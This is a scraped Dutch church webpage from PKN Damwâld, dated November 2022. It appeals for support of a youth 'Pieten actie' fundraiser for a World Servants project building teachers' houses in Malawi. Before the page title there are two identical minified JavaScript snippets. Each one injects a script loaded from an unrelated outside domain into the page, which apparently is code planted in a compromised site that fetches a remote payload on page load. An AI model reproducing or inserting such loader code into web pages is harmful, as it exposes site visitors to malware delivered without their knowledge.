;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Pieten actie World Servants Feanwâlden/Damwâld - PKN Damwâld

Pieten actie World Servants Feanwâlden/Damwâld

Gepubliceerd op: woensdag 16 november 2022

Graag brengen we een project in Malawi onder de aandacht, waar wij aanstaande zomer aan ga meebouwen. Met een groep van (op dit moment) zes jongeren uit Veenwouden en Damwoude gaan we in Malawi drie weken bouwen aan lerarenwoningen, samen met lokale jongeren. Het project is een initiatief van de Nederlandse organisatie World Servants, de lokale organisatie CCAP en de kerk in Ndatuwa.

Met World Servants gaan jaarlijks zo’n 800 jongeren op reis. In een ontwikkelingsland bouwen ze, samen met de lokale gemeenschap, aan een kliniek, school of sanitatievoorzieningen. Het project zorgt niet alleen voor de bouw van zo’n faciliteit, maar ook voor nieuwe kennis en energie in de gemeenschap. Door deel te nemen aan een project, dat in nauw overleg met de plaatselijke organisatie en gemeenschap is opgezet, help je mee leefomstandigheden van de gemeenschap structureel te verbeteren. Daarnaast ontwikkel je jezelf omdat je kennismaakt met de andere leefomstandigheden, met een andere cultuur en met een vaak andere geloofsbeleving.

Iedere deelnemer draagt bij aan de projectkosten door het bijeenbrengen van een eigen deelnemersbijdrage. Hiervan worden onder anderen de reis en het verblijf en een deel van de bouwmaterialen betaald. Voor het project willen we in Damwoude, Veenwouden en omstreken €15.000,- bijeenbrengen, waarvan we een deel uit eigen zak betalen. Het is een behoorlijk bedrag, dat we bij elkaar brengen door het organiseren van sponsor- en verkoopacties. Organisaties als Wilde Ganzen en supporters van World Servants dragen ook bij aan het project.

Een van de acties die we komende periode gaan doen is de Pieten actie (tot en met 5 december). Hierbij kunnen ouders ons inhuren voor een onvergetelijke sinterklaaservaring voor hun kinderen. Uw kerk is gevestigd in onze omgeving. Daarom wil ik u vragen of u als kerk of in uw eigen netwerk dit initiatief wilt ondersteunen door bijgevoegde actie te promoten bij gezinnen met kinderen onder de 12 jaar. Door bijgevoegde poster te plaatsen op de website, de beamer, het kerkblad en evt. op te hangen in de kerkgebouwen. (Meer informatie of contact over deze actie via de link: www.geef.ws/piet). In ruil daarvoor willen we graag samen met jullie kijken wat wij de komende tijd als actiegroep Veenwouden e.o. kunnen bijdragen aan activiteiten en of acties binnen jullie kerk. Mochten daar ideeën over zijn dan komen we graag in contact met de betreffende (werkgroep) of contactpersoon om zo tot een samenwerking te komen. Graag horen we of u bereid bent dit voor ons te betekenen.

Als u positief besluit om naast het promoten van deze actie een financiële bijdrage of collecte te doen, dan kunt u deze overmaken via de website www.geef.ws/Veenwouden . Via www.worldservants.nl kunt u meer informatie vinden over de World Servants-projecten.